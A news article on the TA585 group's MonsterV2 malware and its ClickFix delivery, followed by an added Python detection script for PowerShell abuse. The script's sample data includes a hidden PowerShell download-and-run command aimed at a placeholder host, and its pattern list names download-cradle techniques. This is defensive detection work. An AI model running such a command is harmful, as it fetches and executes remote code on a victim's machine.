A newly identified cybercriminal group, TA585, has been uncovered by cybersecurity researchers for running one of the most autonomous and technically advanced operations in today’s threat landscape.
Unlike many groups that rent access or outsource delivery, TA585 controls its own infrastructure, phishing operations and malware deployment.
A Powerful Malware Tool
Discovered by the Proofpoint team, TA585 is a key distributor of MonsterV2, a premium malware family first advertised on underground forums in February 2025.
Marketed as a remote access Trojan (RAT), stealer and loader, MonsterV2 gives criminals the ability to steal data, monitor victims and install additional payloads.
Proofpoint noted that the malware avoids systems located in Commonwealth of Independent States (CIS) countries and is sold on a subscription basis.
The “Standard” version costs $800 per month, while the “Enterprise” edition, which includes additional modules such as HVNC and Chrome Developer Tools access, is priced at $2000 per month.
Sophisticated Delivery and Filtering
TA585’s early campaigns appeared in February 2025, masquerading as communications from the Internal Revenue Service (IRS) and Small Business Administration (SBA). These messages used the ClickFix technique, a social engineering method that persuades users to execute a PowerShell script manually. Doing so triggered a second script that ultimately installed MonsterV2.
Unlike most threat actors that rely on external brokers or botnets, TA585 uses compromised websites to host malicious JavaScript.
Visitors are shown a fake CAPTCHA overlay prompting them to verify they are human. Behind the scenes, TA585’s systems run detailed filtering checks to ensure genuine user engagement before delivering the malware.
Expanding Attack Channels
The group’s activity broadened later in 2025 with a GitHub-themed campaign that exploited the platform’s notification system.
By tagging legitimate users in fake security alerts, TA585 lured victims to actor-controlled sites that mimicked GitHub’s interface and once again relied on the ClickFix method. Some of these attacks distributed other malware, including Rhadamanthys.
MonsterV2 itself is written in C++, Go and TypeScript, and features robust encryption and self-protection measures.
Proofpoint’s analysis highlighted several key functions and capabilities, including:
- Data theft, including credentials, crypto wallets and browser information
- Remote desktop control through HVNC
- Webcam recording and screenshot capture
- Downloading and executing additional payloads
Proofpoint researchers also observed ongoing development, with the malware receiving frequent updates and minor fixes, such as corrected typos in newer builds.
“[We] anticipate we will continue to see new malware families emerge, many of which contain a variety of capabilities baked into one malware,” the firm warned.
“[We] recommend training users to recognize the ClickFix technique and to prevent non-administrative users from executing PowerShell.”
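The detection logic that recommendation implies, as an added example that is not the article's or Proofpoint's own code: it triages constructed process-creation records, flagging PowerShell started by non-administrative users and, at higher severity, PowerShell launched from the desktop session with download-and-run arguments, which is the footprint a ClickFix lure leaves. The field names, parent-process heuristic and sample records are assumptions.

```python
import re

# Constructed process-creation records (loosely modelled on the fields of a
# Windows 4688 / Sysmon process-creation event); not telemetry from the article.
SAMPLE_EVENTS = [
    {"user": "CORP\\jdoe", "is_admin": False, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/a.txt | iex"'},
    {"user": "CORP\\jdoe", "is_admin": False, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -c Get-Date"},
    {"user": "CORP\\svc-build", "is_admin": True, "parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"user": "CORP\\jdoe", "is_admin": False, "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe"},
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Parents that mean a human launched the process from the desktop session,
# which is how a ClickFix lure gets its script run (assumed heuristic).
INTERACTIVE_PARENTS = {"explorer.exe"}
# Command-line fragments typical of a download-and-run one-liner.
CRADLE_PATTERNS = [
    r"\biwr\b", r"invoke-webrequest", r"\biex\b", r"invoke-expression",
    r"downloadstring", r"-e(nc|ncodedcommand)?\b", r"-w(indowstyle)?\s+hidden",
]

def classify_event(ev):
    """Return (severity, reason) for one event, or None if it is not of interest."""
    if ev["image"].lower() not in POWERSHELL_IMAGES:
        return None
    cmd = ev["cmdline"].lower()
    cradle_hits = [p for p in CRADLE_PATTERNS if re.search(p, cmd)]
    interactive = ev["parent"].lower() in INTERACTIVE_PARENTS
    if not ev["is_admin"] and interactive and cradle_hits:
        return ("high", "non-admin user launched a PowerShell download cradle interactively")
    if not ev["is_admin"]:
        return ("medium", "non-admin user executed PowerShell (policy violation)")
    if cradle_hits:
        return ("medium", "admin launched PowerShell with download-cradle arguments")
    return None

def triage(events):
    """Run classify_event over a batch and keep only the hits, preserving order."""
    findings = []
    for ev in events:
        verdict = classify_event(ev)
        if verdict:
            findings.append({"user": ev["user"], "severity": verdict[0],
                             "reason": verdict[1], "cmdline": ev["cmdline"]})
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['user']}: {f['reason']} :: {f['cmdline']}")
```

The "medium" policy finding is noisy in environments where standard users legitimately script; tune the is_admin field to whatever group membership your telemetry exposes before enforcing it.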